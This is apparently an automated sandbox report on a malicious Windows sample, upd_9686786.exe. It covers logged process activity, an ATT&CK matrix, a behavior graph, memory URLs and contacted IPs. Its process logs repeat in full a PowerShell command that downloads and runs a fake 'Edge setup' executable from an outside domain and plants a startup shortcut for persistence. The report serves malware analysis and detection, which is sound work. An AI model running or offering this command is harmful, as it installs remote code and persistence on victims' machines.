Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"Jump to behavior
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "invoke-webrequest -uri \"https://apple-online.shop/microsoftedgesetup.exe\" -outfile \"$env:tmp/microsoftedgesetup.exe\" ; & \"$env:tmp/microsoftedgesetup.exe\" ; $startupfolder = [system.io.path]::combine($env:appdata, 'microsoft\windows\start menu\programs\startup') ; $programpath = 'c:\users\user\desktop\upd_9686786.exe' ; $shortcutname = 'tuygh.lnk' ; $shortcutpath = [system.io.path]::combine($startupfolder, $shortcutname) ; $wshshell = new-object -comobject wscript.shell ; $shortcut = $wshshell.createshortcut($shortcutpath) ; $shortcut.targetpath = $programpath ; $shortcut.workingdirectory = [system.io.path]::getdirectoryname($programpath) ; $shortcut.save()"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
Windows Management Instrumentation		12
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping121
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		12
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523560 Sample: upd_9686786.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 60 47 Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE 2->47 49 Sigma detected: Suspicious Invoke-WebRequest Execution 2->49 7 upd_9686786.exe 2->7         started        11 upd_9686786.exe 2->11         started        process3 dnsIp4 39 65.38.120.47 SRS-6-Z-7381US United States 7->39 41 217.148.142.19 PROFESIONALHOSTINGES Romania 7->41 43 65.109.226.176 ALABANZA-BALTUS United States 7->43 51 Suspicious powershell command line found 7->51 13 powershell.exe 14 17 7->13         started        18 cmd.exe 1 7->18         started        20 cmd.exe 1 11->20         started        22 powershell.exe 11->22         started        signatures5 process6 dnsIp7 45 172.67.178.253 CLOUDFLARENETUS United States 13->45 37 C:\Users\user\AppData\Roaming\...\tuygh.lnk, MS 13->37 dropped 55 Powershell creates an autostart link 13->55 24 conhost.exe 13->24         started        26 systeminfo.exe 1 1 18->26         started        29 conhost.exe 18->29         started        31 systeminfo.exe 1 20->31         started        33 conhost.exe 20->33         started        35 conhost.exe 22->35         started        file8 signatures9 process10 signatures11 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->53

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://cevcsca2021.ocsp-certum.com07upd_9686786.exefalse
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpfalse
      		unknown
      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000002.00000002.29955133061.0000016F00E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmptrue
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmptrue
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmptrue
            		unknown
            https://go.micropowershell.exe, 00000002.00000002.29955133061.0000016F02153000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmptrue
              		unknown
              http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0wupd_9686786.exefalse
                      		unknown
                      https://www.certum.pl/CPS0upd_9686786.exefalse
                        		unknown
                        http://apple-online.shoppowershell.exe, 00000002.00000002.29955133061.0000016F02B09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B02000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://repository.certum.pl/cevcsca2021.cer0upd_9686786.exefalse
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              https://apple-online.shop/microsoftedgesetup.exepowershell.exe, 00000009.00000002.30278139073.0000020DF3640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF09D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://subca.ocsp-certum.com02upd_9686786.exefalse
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/Pester/Pesterhpowershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://apple-online.shoppowershell.exe, 00000002.00000002.29955133061.0000016F02874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F02B3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://crl.certum.pl/ctnca2.crl0lupd_9686786.exefalse
                                                		unknown
                                                http://repository.certum.pl/ctnca2.cer09upd_9686786.exefalse
                                                  		unknown
                                                  http://www.quovadis.bm0powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://github.com/Pester/PesterXzpowershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://apple-online.shop/MicrosoftEdgeSetup.exepowershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmptrue
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.certum.pl/CPS0upd_9686786.exefalse
                                                                		unknown
                                                                https://oneget.orgpowershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://apple-online.shop/MicrosoftEdgeSetup.powershell.exe, 00000009.00000002.30156809218.0000020D82CC7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      65.38.120.47
                                                                      		unknownUnited States
                                                                      		7381SRS-6-Z-7381USfalse
                                                                      217.148.142.19
                                                                      		unknownRomania
                                                                      		200960PROFESIONALHOSTINGESfalse
                                                                      172.67.178.253
                                                                      		unknownUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      65.109.226.176
                                                                      		unknownUnited States
                                                                      		11022ALABANZA-BALTUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1523560
                                                                      Start date and time:2024-10-01 19:17:33 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 15m 46s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                      Run name:Suspected Instruction Hammering
                                                                      Number of analysed new started processes analysed:14
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:upd_9686786.exe
                                                                      Detection:MAL
                                                                      Classification:mal60.evad.winEXE@18/6@0/4
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 19
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                      • Execution Graph export aborted for target powershell.exe, PID 816 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Skipping network analysis since amount of network traffic is too extensive
                                                                      • VT rate limit hit for: upd_9686786.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      13:20:24API Interceptor47228x Sleep call for process: upd_9686786.exe modified
                                                                      19:19:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      65.38.120.47SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                        SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                          upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                            upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                              upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                  upd_4299382.exeGet hashmaliciousUnknownBrowse
                                                                                    217.148.142.19SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                      SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                        upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                          upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                            upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                              upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                upd_4299382.exeGet hashmaliciousUnknownBrowse
                                                                                                  172.67.178.253upd_4299382.exeGet hashmaliciousUnknownBrowse
                                                                                                    65.109.226.176SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                                      SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                                        upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                                          upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                            upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                                              upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                                upd_4299382.exeGet hashmaliciousUnknownBrowse

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  PROFESIONALHOSTINGESSecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  upd_4299382.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.142.19
                                                                                                                  https://agromur.es/spass/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                  • 185.177.154.5
                                                                                                                  https://vinilosyrotulos.es/modules/orderfiles/files/xsamxadoo/FS/N/loginGet hashmaliciousUnknownBrowse
                                                                                                                  • 217.148.136.200
                                                                                                                  OUdtOLl0w4.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 185.92.246.39
                                                                                                                  SRS-6-Z-7381USPurchaseXOrderXPO16145.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.86
                                                                                                                  PurchaseXOrderXPO16145.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.86
                                                                                                                  PurchaseXOrderXPO16145.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.86
                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.47
                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.4832.25615.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.47
                                                                                                                  upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.47
                                                                                                                  upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.47
                                                                                                                  upd_1416836.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.47
                                                                                                                  upd_8816295.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.47
                                                                                                                  Modulo32 (2).jarGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.38.120.211
                                                                                                                  CLOUDFLARENETUSPrismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                  • 104.22.74.216
                                                                                                                  Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                  • 172.67.183.74
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.77.132
                                                                                                                  moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                  • 104.18.20.226
                                                                                                                  https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.64.151.101
                                                                                                                  https://k7qo.sarnerholz.cam/APRjVfmkGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.179.163
                                                                                                                  ELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  ALABANZA-BALTUShttps://linke.to/pkmlogisticsGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.109.83.59
                                                                                                                  http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 65.109.119.234
